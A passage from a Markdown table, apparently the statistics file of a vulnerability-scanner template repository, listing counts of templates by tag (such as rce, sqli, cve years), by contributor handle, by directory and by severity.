pikpikcu | 353 | network | 131 | critical | 919 | | | +| exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | | +| wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | | +| osint | 677 | pdteam | 286 | dns | 17 | | | | | +| tech | 649 | ricardomaia | 229 | headless | 11 | | | | | +| lfi | 619 | geeknik | 224 | code | 3 | | | | | +| edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | | +| misconfig | 572 | r3y3r53 | 200 | TEMPLATES-STATS.json | 1 | | | | | +| rce | 547 | 0x_akoko | 179 | contributors.json | 1 | | | | | +| packetstorm | 510 | princechaddha | 163 | | | | | | | +| cve2021 | 474 | gy741 | 155 | | | | | | | +| wpscan | 468 | sleepingbag945 | 132 | | | | | | | +| cve2022 | 459 | arafatansari | 119 | | | | | | | +| wp | 392 | tess | 109 | | | | | | | +| unauth | 352 | madrobot | 65 | | | | | | | +| authenticated | 326 | zzeitlin | 64 | | | | | | | +| file | 321 | idealphase | 63 | | | | | | | +| cve2023 | 313 | pdresearch | 63 | | | | | | | +| sqli | 297 | righettod | 61 | | | | | | | +| intrusive | 276 | akincibor | 59 | | | | | | | +| cve2020 | 254 | for3stco1d | 55 | | | | | | | +| kev | 253 | iamnoooob | 53 | | | | | | | +| token-spray | 242 | philippedelteil | 47 | | | | | | | +| top-200 | 215 | rootxharsh | 45 | | | | | | | +| config | 215 | gaurang | 42 | | | | | | | +| osint-social | 210 | edoardottt | 41 | | | | | | | +| oast | 208 | c-sh0 | 35 | | | | | | | +| | 195 | johnk3r | 34 | | | | | | | +| token | 194 | j4vaovo | 33 | | | | | | | +| login | 188 | adam crosser | 31 | | | | | | | +| default-login | 188 | luisfelipe146 | 31 | | | | | | | +| detect | 171 | ice3man | 28 | | | | | | | +| apache | 169 | pwnhxl | 25 | | | | | | | +| iot | 164 | hardik-solanki | 24 | | | | | | | +| cve2018 | 160 | organiccrap | 24 | | | | | | | +| cve2019 | 157 | harsh | 23 | | | | | | | +| joomla | 146 | techbrunchfr | 23 | | | | | | | +| network | 139 | ffffffff0x | 22 | | | | | | | +| malware | 139 | ctflearner | 21 | | | | | | | +| redirect | 129 | cckuailong | 18 | | | | | | | +| auth-bypass | 114 | sullo | 18 | | | | | | | +| cve2010 | 112 | parthmalhotra | 17 | | | | | | | +| files | 111 | lu4nx | 16 | | | | | | | +| cve2017 | 109 | random-robbie | 16 | | | | | | | +| ssrf | 107 | rxerium | 16 | | | | | | | +| cms | 107 | shaikhyaser | 16 | | | | | | | +| router | 105 | 0xpugazh | 16 | | | | | | | +| install | 101 | unapibageek | 15 | | | | | | | +| top-100 | 100 | pr3r00t | 15 | | | | | | | +| disclosure | 87 | sheikhrishad | 15 | | | | | | | +| devops | 86 | tenbird | 14 | | | | | | | +| seclists | 75 | milo2012 | 14 | | | | | | | +| takeover | 75 | dogasantos | 14 | | | | | | | +| fileupload | 71 | r3dg33k | 14 | | | | | | | +| oracle | 70 | theabhinavgaur | 13 | | | | | | | +| oss | 66 | melbadry9 | 13 | | | | | | | +| cisco | 62 | nullfuzz | 13 | | | | | | | +| huntr | 59 | 0ri2n | 13 | | | | | | | +| adobe | 57 | sharath | 13 | | | | | | | +| cve2015 | 56 | meme-lord | 12 | | | | | | | +| atlassian | 56 | suman_kar | 12 | | | | | | | +| cve2016 | 55 | elsfa7110 | 11 | | | | | | | +| vmware | 54 | cyllective | 11 | | | | | | | +| google | 54 | wdahlenb | 11 | | | | | | | +| tokens | 52 | nadino | 10 | | | | | | | +| ir | 50 | mastercho | 10 | | | | | | | +| logs | 46 | co5mos | 10 | | | | | | | +| log4j | 46 | hackergautam | 10 | | | | | | | +| tenable | 46 | logicalhunter | 10 | | | | | | | +| osint-gaming | 45 | random_robbie | 10 | | | | | | | +| hackerone | 44 | 0x240x23elu | 10 | | | | | | | +| debug | 44 | alph4byt3 | 10 | | | | | | | +| aem | 44 | bhutch | 10 | | | | | | | +| vulhub | 44 | momika233 | 9 | | | | | | | +| cve2014 | 43 | fabaff | 9 | | | | | | | +| c2 | 43 | adamcrosser | 9 | | | | | | | +| jndi | 43 | olearycrew | 9 | | | | | | | +| plugin | 42 | kazet | 9 | | | | | | | +| osint-porn | 42 | oppsec | 9 | | | | | | | +| osint-hobby | 42 | emadshanab | 9 | | | | | | | +| generic | 41 | zh | 8 | | | | | | | +| traversal | 41 | noraj | 8 | | | | | | | +| oa | 39 | that_juan_ | 8 | | | | | | | +| deserialization | 39 | irshad ahamed | 8 | | | | | | | +| springboot | 39 | iamthefrogy | 8 | | | | | | | +| aws | 39 | aashiq | 8 | | | | | | | +| jira | 37 | veshraj | 8 | | | | | | | +| listing | 37 | _0xf4n9x_ | 8 | | | | | | | +| kubernetes | 37 | tarunkoyalwar | 7 | | | | | | | +| cnvd | 37 | divya_mudgal | 7 | | | | | | | +| php | 35 | leovalcante | 7 | | | | | | | +| osint-misc | 35 | its0x08 | 7 | | | | | | | +| injection | 35 | dr_set | 7 | | | | | | | +| misc | 35 | kophjager007 | 7 | | | | | | | +| microsoft | 34 | nodauf | 7 | | | | | | | +| cti | 32 | amit-jd | 7 | | | | | | | +| sap | 31 | caspergn | 7 | | | | | | | +| osint-tech | 31 | randomstr1ng | 7 | | | | | | | +| osint-coding | 30 | huta0 | 7 | | | | | | | +| fuzz | 30 | me_dheeraj | 7 | | | | | | | +| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | +| gitlab | 28 | harshbothra_ | 7 | | | | | | | +| wp-theme | 28 | techryptic (@tech) | 7 | | | | | | | +| k8s | 28 | __fazal | 6 | | | | | | | +| api | 27 | gitlab red team | 6 | | | | | | | +| ssl | 27 | devang-solanki | 6 | | | | | | | +| bestwebsoft | 27 | justaacat | 6 | | | | | | | +| ssh | 26 | imnightmaree | 6 | | | | | | | +| dlink | 26 | byt3bl33d3r | 6 | | | | | | | +| cve2012 | 26 | xelkomy | 6 | | | | | | | +| weaver | 25 | ja1sh | 6 | | | | | | | +| firewall | 25 | pathtaga | 6 | | | | | | | +| proxy | 25 | pentest_swissky | 6 | | | | | | | +| osint-images | 24 | forgedhallpass | 6 | | | | | | | +| osint-finance | 24 | evan rubinstein | 6 | | | | | | | +| keys | 24 | puzzlepeaches | 6 | | | | | | | +| manageengine | 24 | praetorian-thendrickson | 6 | | | | | | | +| amazon | 24 | clem9669 | 6 | | | | | | | +| osint-shopping | 24 | megamansec | 6 | | | | | | | +| osint-business | 24 | vicrack | 5 | | | | | | | +| stored-xss | 23 | andreluna | 5 | | | | | | | +| cloud | 23 | kh4sh3i | 5 | | | | | | | +| fortinet | 23 | r12w4n | 5 | | | | | | | +| tomcat | 23 | yanyun | 5 | | | | | | | +| lfr | 23 | robotshell | 5 | | | | | | | +| zoho | 23 | prajiteshsingh | 5 | | | | | | | +| admin | 22 | podalirius | 5 | | | | | | | +| ibm | 22 | panch0r3d | 5 | | | | | | | +| printer | 21 | defr0ggy | 5 | | | | | | | +| yonyou | 21 | shine | 5 | | | | | | | +| weblogic | 21 | ganofins | 5 | | | | | | | +| cicd | 21 | s0obi | 5 | | | | | | | +| msf | 21 | mr-xn | 5 | | | | | | | +| ecology | 21 | joanbono | 5 | | | | | | | +| github | 20 | powerexploit | 5 | | | | | | | +| citrix | 20 | 3th1c_yuk1 | 4 | | | | | | | +| xxe | 20 | e_schultze_ | 4 | | | | | | | +| camera | 20 | dadevel | 4 | | | | | | | +| rukovoditel | 19 | tanq16 | 4 | | | | | | | +| jenkins | 19 | lum8rjack | 4 | | | | | | | +| dns | 19 | dolev farhi | 4 | | | | | | | +| hp | 19 | h1ei1 | 4 | | | | | | | +| grafana | 19 | ggranjus | 4 | | | | | | | +| struts | 19 | scent2d | 4 | | | | | | | +| enum | 19 | arm!tage | 4 | | | | | | | +| android | 18 | incogbyte | 4 | | | | | | | +| osint-music | 18 | nybble04 | 4 | | | | | | | +| service | 18 | ice3man543 | 4 | | | | | | | +| wavlink | 18 | wisnupramoedya | 4 | | | | | | | +| js | 17 | shankar acharya | 4 | | | | | | | +| nginx | 17 | r3naissance | 4 | | | | | | | +| ftp | 17 | k0pak4 | 4 | | | | | | | +| cve2011 | 17 | 0w4ys | 3 | | | | | | | +| alibaba | 16 | johnjhacking | 3 | | | | | | | +| confluence | 16 | ekrause | 3 | | | | | | | +| cve2009 | 16 | ph33r | 3 | | | | | | | +| mail | 16 | lark-lab | 3 | | | | | | | +| jarm | 16 | yash anand @yashanand155 | 3 | | | | | | | +| osint-blog | 16 | king-alexander | 3 | | | | | | | +| status | 16 | dr0pd34d | 3 | | | | | | | +| rconfig | 16 | yuzhe-zhang-0 | 3 | | | | | | | +| microweber | 16 | jarijaas | 3 | | | | | | | +| backup | 16 | taielab | 3 | | | | | | | +| ruijie | 16 | hahwul | 3 | | | | | | | +| honeypot | 16 | splint3r7 | 3 | | | | | | | +| node.js | 16 | true13 | 3 | | | | | | | +| coldfusion | 15 | parth | 3 | | | | | | | +| tongda | 15 | f1tz | 3 | | | | | | | +| cve2008 | 15 | binaryfigments | 3 | | | | | | | +| cnvd2021 | 15 | lucasljm2001 | 3 | | | | | | | +| java | 15 | farish | 3 | | | | | | | +| zyxel | 15 | dudez | 3 | | | | | | | +| seeyon | 15 | swissky | 3 | | | | | | | +| magento | 15 | alifathi-h1 | 3 | | | | | | | +| woocommerce | 15 | thomas_from_offensity | 3 | | | | | | | +| zohocorp | 14 | lucky0x0d | 3 | | | | | | | +| audit | 14 | canberbamber | 3 | | | | | | | +| login-check | 14 | bernardofsr | 3 | | | | | | | +| jboss | 14 | imjust0 | 3 | | | | | | | +| icewarp | 14 | cheesymoon | 3 | | | | | | | +| tls | 14 | me9187 | 3 | | | | | | | +| auth | 14 | e1a | 3 | | | | | | | +| dell | 14 | andydoering | 3 | | | | | | | +| prestashop | 14 | whoever | 3 | | | | | | | +| osint-art | 14 | xianke | 3 | | | | | | | +| bypass | 14 | heeress | 3 | | | | | | | +| osint-health | 14 | m4lwhere | 3 | | | | | | | +| cve2013 | 14 | emenalf | 3 | | | | | | | +| nodejs | 14 | matt galligan | 3 | | | | | | | +| creds-stuffing | 14 | huowuzhao | 3 | | | | | | | +| npm | 14 | z3bd | 3 | | | | | | | +| domainmod | 14 | arcc | 3 | | | | | | | +| azure | 14 | mavericknerd | 3 | | | | | | | +| sonicwall | 13 | aringo | 3 | | | | | | | +| file-upload | 13 | davidmckennirey | 3 | | | | | | | +| smtp | 13 | badboycxcc | 3 | | | | | | | +| rails | 13 | impramodsargar | 3 | | | | | | | +| airflow | 13 | fxploit | 3 | | | | | | | +| fortigate | 13 | _generic_human_ | 3 | | | | | | | +| cuppa | 13 | randomrobbie | 3 | | | | | | | +| cuppacms | 13 | vsh00t | 3 | | | | | | | +| osint-political | 13 | sushantkamble | 3 | | | | | | | +| setup | 13 | fyoorer | 3 | | | | | | | +| abstractapi | 13 | unstabl3 | 3 | | | | | | | +| osint-dating | 13 | shifacyclewala | 3 | | | | | | | +| laravel | 13 | ambassify | 3 | | | | | | | +| git | 13 | vagnerd | 3 | | | | | | | +| vpn | 13 | skeltavik | 3 | | | | | | | +| node | 13 | evergreencartoons | 3 | | | | | | | +| ruby | 13 | atomiczsec | 3 | | | | | | | +| zimbra | 12 | ricardo maia (brainfork) | 2 | | | | | | | +| dashboard | 12 | maximus decimus | 2 | | | | | | | +| moosocial | 12 | zy9ard3 | 2 | | | | | | | +| kafka | 12 | brucelsone | 2 | | | | | | | +| backdoor | 12 | uomogrande | 2 | | | | | | | +| netsweeper | 12 | paperpen | 2 | | | | | | | +| redis | 12 | bp0lr | 2 | | | | | | | +| headless | 12 | z0ne | 2 | | | | | | | +| netgear | 12 | sascha brendel | 2 | | | | | | | +| webserver | 12 | thevillagehacker | 2 | | | | | | | +| drupal | 12 | nkxxkn | 2 | | | | | | | +| graphql | 12 | dheerajmadhukar | 2 | | | | | | | +| javascript | 12 | thezakman | 2 | | | | | | | +| jolokia | 11 | flx | 2 | | | | | | | +| online_fire_reporting_system_project | 11 | nvn1729 | 2 | | | | | | | +| fastjson | 11 | dbrwsky | 2 | | | | | | | +| xstream | 11 | joshlarsen | 2 | | | | | | | +| windows | 11 | israel comazzetto dos reis | 2 | | | | | | | +| online-fire-reporting | 11 | 666asd | 2 | | | | | | | +| spring | 11 | dahse89 | 2 | | | | | | | +| phpgurukul | 11 | redteambrasil | 2 | | | | | | | +| docker | 11 | notnotnotveg | 2 | | | | | | | +| phpmyadmin | 11 | wa1tf0rme | 2 | | | | | | | +| osint-video | 11 | 8arthur | 2 | | | | | | | +| ssti | 11 | smaranchand | 2 | | | | | | | +| zabbix | 10 | 0xelkomy | 2 | | | | | | | +| elasticsearch | 10 | d4vy | 2 | | | | | | | +| symfony | 10 | codexlynx | 2 | | | | | | | +| installer | 10 | socketz | 2 | | | | | | | +| thinkphp | 10 | g4l1t0 | 2 | | | | | | | +| nagios | 10 | bananabr | 2 | | | | | | | +| solarview | 10 | florianmaak | 2 | | | | | | | +| django | 10 | ajaysenr | 2 | | | | | | | +| glpi | 10 | dogancanbakir | 2 | | | | | | | +| cache | 10 | shelled | 2 | | | | | | | +| xstream_project | 10 | gevakun | 2 | | | | | | | +| dedecms | 10 | n-thumann | 2 | | | | | | | +| db | 10 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| sitecore | 10 | luci | 2 | | | | | | | +| prometheus | 10 | supr4s | 2 | | | | | | | +| digitalocean | 10 | paradessia | 2 | | | | | | | +| wso2 | 9 | manas_harsh | 2 | | | | | | | +| druid | 9 | afaq | 2 | | | | | | | +| cnvd2020 | 9 | vavkamil | 2 | | | | | | | +| kube | 9 | joshua rogers | 2 | | | | | | | +| hashicorp | 9 | clarkvoss | 2 | | | | | | | +| pfsense | 9 | j3ssie | 2 | | | | | | | +| opencats | 9 | cckuakilong | 2 | | | | | | | +| hikvision | 9 | mzack9999 | 2 | | | | | | | +| bitbucket | 9 | bsysop | 2 | | | | | | | +| versa | 9 | v0idc0de | 2 | | | | | | | +| scada | 9 | sinkettu | 2 | | | | | | | +| ofbiz | 9 | gal nagli | 2 | | | | | | | +| sangfor | 9 | herry | 2 | | | | | | | +| firebase | 9 | 0xsapra | 2 | | | | | | | +| vbulletin | 9 | randomdhiraj | 2 | | | | | | | +| vcenter | 9 | danmcinerney | 2 | | | | | | | +| iis | 9 | myztique | 2 | | | | | | | +| solr | 9 | lotusdll | 2 | | | | | | | +| gitea | 9 | 6mile | 2 | | | | | | | +| jetbrains | 9 | gtrrnr | 2 | | | | | | | +| secret | 9 | danielmofer | 2 | | | | | | | +| artica | 9 | kiblyn11 | 2 | | | | | | | +| hms | 8 | foulenzer | 2 | | | | | | | +| emerge | 8 | bing0o | 2 | | | | | | | +| moodle | 8 | sy3omda | 2 | | | | | | | +| huawei | 8 | ep1csage | 2 | | | | | | | +| ivanti | 8 | martincodes-de | 2 | | | | | | | +| atom | 8 | brenocss | 2 | | | | | | | +| cisco-switch | 8 | 0xcrypto | 2 | | | | | | | +| recon | 8 | thardt-praetorian | 2 | | | | | | | +| phpinfo | 8 | parzival | 2 | | | | | | | +| spotweb | 8 | raesene | 2 | | | | | | | +| symantec | 8 | joeldeleep | 2 | | | | | | | +| console | 8 | mrharshvardhan | 2 | | | | | | | +| elastic | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| metadata | 8 | cocxanh | 2 | | | | | | | +| manager | 8 | ree4pwn | 2 | | | | | | | +| osint-news | 8 | pxmme1337 | 2 | | | | | | | +| mirai | 8 | koti2 | 2 | | | | | | | +| default-page | 8 | streetofhackerr007 | 2 | | | | | | | +| unauthenticated | 8 | moritz nentwig | 2 | | | | | | | +| config-audit | 8 | shankaracharya | 2 | | | | | | | +| exchange | 8 | github.com/its0x08 | 2 | | | | | | | +| e-office | 8 | udit_thakkur | 2 | | | | | | | +| bucket | 8 | korteke | 2 | | | | | | | +| ognl | 8 | ayadim | 2 | | | | | | | +| info-leak | 8 | zomsop82 | 2 | | | | | | | +| oauth | 8 | convisoappsec | 2 | | | | | | | +| crlf | 8 | sbani | 2 | | | | | | | +| phpjabbers | 8 | geekby | 2 | | | | | | | +| dropbox | 7 | k11h-de | 2 | | | | | | | +| car_rental_management_system_project | 7 | h0j3n | 2 | | | | | | | +| facebook | 7 | hackerarpan | 2 | | | | | | | +| blind | 7 | kishore-hariram | 2 | | | | | | | +| maps | 7 | 0xnirvana | 2 | | | | | | | +| fortios | 7 | 0xrudra | 2 | | | | | | | +| cacti | 7 | rafaelwdornelas | 2 | | | | | | | +| bloofox | 7 | liwermor | 2 | | | | | | | +| wanhu | 7 | x1m_martijn | 2 | | | | | | | +| vms | 7 | amsda | 2 | | | | | | | +| bigip | 7 | nuk3s3c | 2 | | | | | | | +| solarwinds | 7 | ehsahil | 2 | | | | | | | +| redhat | 7 | davidegirardi | 2 | | | | | | | +| pmb | 7 | supras | 2 | | | | | | | +| instrusive | 7 | kre80r | 2 | | | | | | | +| gogs | 7 | 0xsmiley | 2 | | | | | | | +| error | 7 | your3cho | 2 | | | | | | | +| squirrelmail | 7 | y4er | 2 | | | | | | | +| activemq | 7 | mohammedsaneem | 2 | | | | | | | +| samsung | 7 | c3l3si4n | 2 | | | | | | | +| go | 7 | coldfish | 2 | | | | | | | +| websphere | 7 | w4cky_ | 2 | | | | | | | +| filemanager | 7 | hetroublemakr | 2 | | | | | | | +| sophos | 7 | pry0cc | 1 | | | | | | | +| ec2 | 7 | exploitation | 1 | | | | | | | +| odoo | 7 | secthebit | 1 | | | | | | | +| shopify | 7 | allenwest24 | 1 | | | | | | | +| spotweb_project | 7 | th3.d1p4k | 1 | | | | | | | +| nagiosxi | 7 | jteles | 1 | | | | | | | +| mobileiron | 7 | 0xrod | 1 | | | | | | | +| nacos | 7 | th3r4id | 1 | | | | | | | +| moodating | 7 | whotwagner | 1 | | | | | | | +| ruckus | 7 | j3ssie/geraldino2 | 1 | | | | | | | +| avtech | 7 | tirtha | 1 | | | | | | | +| monstra | 7 | michael wedl | 1 | | | | | | | +| blockchain | 7 | ynnirc | 1 | | | | | | | +| python | 7 | joaonevess | 1 | | | | | | | +| discord | 7 | justmumu | 1 | | | | | | | +| exploitdb | 7 | ayadi | 1 | | | | | | | +| joomla\! | 7 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | | | | | | | | +| keking | 6 | 5up3r541y4n | 1 | | | | | | | +| asp | 6 | hazana | 1 | | | | | | | +| liferay | 6 | alperenkesk | 1 | | | | | | | +| kubelet | 6 | pbuff07 | 1 | | | | | | | +| cockpit | 6 | matt miller | 1 | | | | | | | +| magmi | 6 | prettyboyaaditya | 1 | | | | | | | +| elfinder | 6 | francescocarlucci | 1 | | | | | | | +| zhiyuan | 6 | aaban solutions | 1 | | | | | | | +| s3 | 6 | jcockhren | 1 | | | | | | | +| webmin | 6 | af001 | 1 | | | | | | | +| flutterwave | 6 | dorkerdevil | 1 | | | | | | | +| lucee | 6 | sospiro | 1 | | | | | | | +| 74cms | 6 | exceed | 1 | | | | | | | +| servicenow | 6 | jacalynli | 1 | | | | | | | +| jeecg | 6 | abbas.heybati | 1 | | | | | | | +| typo3 | 6 | zhenwarx | 1 | | | | | | | +| openvpn | 6 | topscoder | 1 | | | | | | | +| oos | 6 | sickwell | 1 | | | | | | | +| jetty | 6 | ahmetpergamum | 1 | | | | | | | +| minio | 6 | palanichamy_perumal | 1 | | | | | | | +| nexus | 6 | mabdullah22 | 1 | | | | | | | +| database | 6 | husain | 1 | | | | | | | +| nortekcontrol | 6 | ohlinge | 1 | | | | | | | +| doctor-appointment-system | 6 | kagamigawa | 1 | | | | | | | +| newrelic | 6 | kresec | 1 | | | | | | | +| log | 6 | shifacyclewla | 1 | | | | | | | +| advantech | 6 | ooooooo_q | 1 | | | | | | | +| doctor_appointment_system_project | 6 | xcapri | 1 | | | | | | | +| contec | 6 | amnotacat | 1 | | | | | | | +| f5 | 6 | phyr3wall | 1 | | | | | | | +| rfi | 6 | hotpot | 1 | | | | | | | +| microstrategy | 6 | nagli | 1 | | | | | | | +| leak | 6 | b4uh0lz | 1 | | | | | | | +| cobbler | 6 | 0h1in9e | 1 | | | | | | | +| jamf | 6 | failopen | 1 | | | | | | | +| sonarqube | 6 | lethargynavigator | 1 | | | | | | | +| opensis | 6 | lark lab | 1 | | | | | | | +| geoserver | 6 | rodnt | 1 | | | | | | | +| microfocus | 6 | elouhi | 1 | | | | | | | +| fpd | 6 | imhunterand | 1 | | | | | | | +| couchdb | 6 | amirmsafari | 1 | | | | | | | +| slack | 6 | petergrifin | 1 | | | | | | | +| plesk | 6 | geraldino2 | 1 | | | | | | | +| tikiwiki | 6 | ransomsec | 1 | | | | | | | +| mongodb | 6 | zeyad azima | 1 | | | | | | | +| gocd | 5 | notwhy | 1 | | | | | | | +| fatpipe | 5 | zn9988 | 1 | | | | | | | +| strapi | 5 | bughuntersurya | 1 | | | | | | | +| dionaea | 5 | 0xh7ml | 1 | | | | | | | +| terramaster | 5 | intx0x80 | 1 | | | | | | | +| agentejo | 5 | co0nan | 1 | | | | | | | +| linux | 5 | queencitycyber | 1 | | | | | | | +| jupyter | 5 | erikowen | 1 | | | | | | | +| vehicle_service_management_system_project | 5 | majidmc2 | 1 | | | | | | | +| hybris | 5 | sec_hawk | 1 | | | | | | | +| ethereum | 5 | ringo | 1 | | | | | | | +| mysql | 5 | unblvr1 | 1 | | | | | | | +| genetechsolutions | 5 | compr00t | 1 | | | | | | | +| magmi_project | 5 | ofjaaah | 1 | | | | | | | +| avaya | 5 | nielsing | 1 | | | | | | | +| metinfo | 5 | 0xtavian | 1 | | | | | | | +| apisix | 5 | jfbes | 1 | | | | | | | +| bmc | 5 | galoget | 1 | | | | | | | +| xmlrpc | 5 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| carrental | 5 | nuts7 | 1 | | | | | | | +| sftp | 5 | willd96 | 1 | | | | | | | +| thedigitalcraft | 5 | un-fmunozs | 1 | | | | | | | +| 10web | 5 | technicaljunkie | 1 | | | | | | | +| dahua | 5 | borna nematzadeh | 1 | | | | | | | +| mlflow | 5 | higor melgaço (eremit4) | 1 | | | | | | | +| wbce | 5 | adrianmf | 1 | | | | | | | +| square | 5 | miguelsegoviagil | 1 | | | | | | | +| resin | 5 | knassar702 | 1 | | | | | | | +| smb | 5 | bjhulst | 1 | | | | | | | +| adminer | 5 | realexp3rt | 1 | | | | | | | +| avideo | 5 | couskito | 1 | | | | | | | +| circarlife | 5 | rotembar | 1 | | | | | | | +| parallels | 5 | ling | 1 | | | | | | | +| firmware | 5 | ipanda | 1 | | | | | | | +| awstats | 5 | gboddin | 1 | | | | | | | +| asana | 5 | ruppde | 1 | | | | | | | +| web3 | 5 | thelicato | 1 | | | | | | | +| zzzcms | 5 | kabirsuda | 1 | | | | | | | +| vrealize | 5 | youngpope | 1 | | | | | | | +| akamai | 5 | stupidfish | 1 | | | | | | | +| beyondtrust | 5 | duty_1g | 1 | | | | | | | +| jabber | 5 | 0xceba | 1 | | | | | | | +| gateway | 5 | official_blackhat13 | 1 | | | | | | | +| chamilo | 5 | jaimin gondaliya | 1 | | | | | | | +| tenda | 5 | godfatherorwa | 1 | | | | | | | +| server | 5 | x6263 | 1 | | | | | | | +| sysaid | 5 | gpiechnik2 | 1 | | | | | | | +| chanjet | 5 | jiheon-dev | 1 | | | | | | | +| craftcms | 5 | adnanekhan | 1 | | | | | | | +| express | 5 | evolutionsec | 1 | | | | | | | +| kkfileview | 5 | danigoland | 1 | | | | | | | +| keycloak | 5 | affix | 1 | | | | | | | +| jwt | 5 | cbadke | 1 | | | | | | | +| caucho | 5 | dali | 1 | | | | | | | +| papercut | 5 | mlec | 1 | | | | | | | +| storage | 5 | apt-mirror | 1 | | | | | | | +| openemr | 5 | 1337kro | 1 | | | | | | | +| percha | 5 | yavolo | 1 | | | | | | | +| paypal | 5 | irshadahamed | 1 | | | | | | | +| rseenet | 5 | jbaines-r7 | 1 | | | | | | | +| sql | 5 | dabla | 1 | | | | | | | +| landray | 5 | win3zz | 1 | | | | | | | +| matrix | 5 | xeldax | 1 | | | | | | | +| splunk | 5 | zsusac | 1 | | | | | | | +| openstack | 5 | cookiehanhoan | 1 | | | | | | | +| circontrol | 5 | 0xprial | 1 | | | | | | | +| dolibarr | 4 | invisiblethreat | 1 | | | | | | | +| puppet | 4 | floriandewald | 1 | | | | | | | +| mautic | 4 | noah @thesubtlety | 1 | | | | | | | +| mailchimp | 4 | iphantasmic | 1 | | | | | | | +| concrete | 4 | clment cruchet | 1 | | | | | | | +| owncloud | 4 | vikas kundu | 1 | | | | | | | +| hongfan | 4 | pussycat0 | 1 | | | | | | | +| synacor | 4 | kareemse1im | 1 | | | | | | | +| metasploit | 4 | aaronchen0 | 1 | | | | | | | +| veronalabs | 4 | yaser_s | 1 | | | | | | | +| d-link | 4 | elder tao | 1 | | | | | | | +| jfrog | 4 | akokonunes | 1 | | | | | | | +| cve2007 | 4 | fmunozs | 1 | | | | | | | +| jorani | 4 | arall | 1 | | | | | | | +| cnvd2022 | 4 | ahmed abou-ela | 1 | | | | | | | +| glpi-project | 4 | carlosvieira | 1 | | | | | | | +| harmistechnology | 4 | absshax | 1 | | | | | | | +| eclipse | 4 | mah3sec_ | 1 | | | | | | | +| roxy | 4 | patrick pirker | 1 | | | | | | | +| httpd | 4 | 0xd0ff9 | 1 | | | | | | | +| joomlamo | 4 | push4d | 1 | | | | | | | +| prtg | 4 | bad5ect0r | 1 | | | | | | | +| pentaho | 4 | patralos | 1 | | | | | | | +| ems | 4 | hczdmr | 1 | | | | | | | +| search | 4 | thebinitghimire | 1 | | | | | | | +| pluginus | 4 | cravaterouge | 1 | | | | | | | +| royalevent | 4 | elitebaz | 1 | | | | | | | +| codeigniter | 4 | jonathanwalker | 1 | | | | | | | +| webkul | 4 | bugvsme | 1 | | | | | | | +| thinkcmf | 4 | yashanand155 | 1 | | | | | | | +| kingsoft | 4 | ndmalc | 1 | | | | | | | +| wcs | 4 | alevsk | 1 | | | | | | | +| springcloud | 4 | mariam tariq | 1 | | | | | | | +| shiro | 4 | mass0ma | 1 | | | | | | | +| elementor | 4 | igibanez | 1 | | | | | | | +| fit2cloud | 4 | sshell | 1 | | | | | | | +| newstatpress_project | 4 | b0rn2r00t | 1 | | | | | | | +| cve2005 | 4 | osamahamad | 1 | | | | | | | +| qdpm | 4 | qlkwej | 1 | | | | | | | +| gnuboard | 4 | andirrahmani1 | 1 | | | | | | | +| horde | 4 | luqmaan hadia | 1 | | | | | | | +| casaos | 4 | thabisocn | 1 | | | | | | | +| telesquare | 4 | screamy | 1 | | | | | | | +| osint-archived | 4 | charanrayudu | 1 | | | | | | | +| wp-statistics | 4 | kailashbohara | 1 | | | | | | | +| totolink | 4 | carrot2 | 1 | | | | | | | +| openfire | 4 | kaizensecurity | 1 | | | | | | | +| flink | 4 | kiks7 | 1 | | | | | | | +| arcgis | 4 | 0xcharan | 1 | | | | | | | +| photo | 4 | nobody | 1 | | | | | | | +| nextjs | 4 | wlayzz | 1 | | | | | | | +| kevinlab | 4 | schniggie | 1 | | | | | | | +| powerjob | 4 | s1r1us | 1 | | | | | | | +| harbor | 4 | guax1 | 1 | | | | | | | +| ampache | 4 | miryangjung | 1 | | | | | | | +| teamcity | 4 | dale clarke | 1 | | | | | | | +| panos | 4 | unp4ck | 1 | | | | | | | +| goanywhere | 4 | ok_bye_now | 1 | | | | | | | +| bitrix | 4 | iampritam | 1 | | | | | | | +| nosqli | 4 | sinsinology | 1 | | | | | | | +| kibana | 4 | yusakie | 1 | | | | | | | +| ternaria | 4 | dhiyaneshdki | 1 | | | | | | | +| adb | 4 | higor melgaço | 1 | | | | | | | +| flickr | 4 | b0yd | 1 | | | | | | | +| pega | 4 | akshansh | 1 | | | | | | | +| mostracms | 4 | fpatrik | 1 | | | | | | | +| dropbear | 4 | pudsec | 1 | | | | | | | +| metabase | 4 | evan rubinstien | 1 | | | | | | | +| age-encryption | 4 | _c0wb0y_ | 1 | | | | | | | +| froxlor | 4 | ola456 | 1 | | | | | | | +| cloudflare | 4 | jrolf | 1 | | | | | | | +| hongdian | 4 | chron0x | 1 | | | | | | | +| auieo | 4 | jeya.seelan | 1 | | | | | | | +| webshell | 4 | exid | 1 | | | | | | | +| phppgadmin | 4 | 0xelkomy & c0nqr0r | 1 | | | | | | | +| digitaldruid | 4 | viondexd | 1 | | | | | | | +| purchase_order_management_system_project | 4 | y0no | 1 | | | | | | | +| pmb_project | 4 | manasmbellani | 1 | | | | | | | +| churchcrm | 4 | undefl0w | 1 | | | | | | | +| aura | 4 | udyz | 1 | | | | | | | +| lfprojects | 4 | alex | 1 | | | | | | | +| sendgrid | 4 | akash.c | 1 | | | | | | | +| swagger | 4 | luqmaan hadia | 1 | | | | | | | +| | | [luqiih](https://github.com/luqiih) | | | | | | | | +| mostra | 4 | axrk | 1 | | | | | | | +| httpserver | 4 | jub0bs | 1 | | | | | | | +| nuuo | 4 | chetgan | 1 | | | | | | | +| kyocera | 4 | arliya | 1 | | | | | | | +| grav | 4 | rumble773 | 1 | | | | | | | +| twitter | 4 | aron molnar | 1 | | | | | | | +| heroku | 4 | retr02332 | 1 | | | | | | | +| umbraco | 4 | esonhugh | 1 | | | | | | | +| rubyonrails | 4 | harshinsecurity | 1 | | | | | | | +| yeswiki | 4 | fq_hsu | 1 | | | | | | | +| postmessage | 4 | mesaglio | 1 | | | | | | | +| sentry | 4 | rivalsec | 1 | | | | | | | +| voip | 4 | dmartyn | 1 | | | | | | | +| reprisesoftware | 4 | danfaizer | 1 | | | | | | | +| finicity | 4 | omarkurt | 1 | | | | | | | +| jellyfin | 4 | tea | 1 | | | | | | | +| confluent | 4 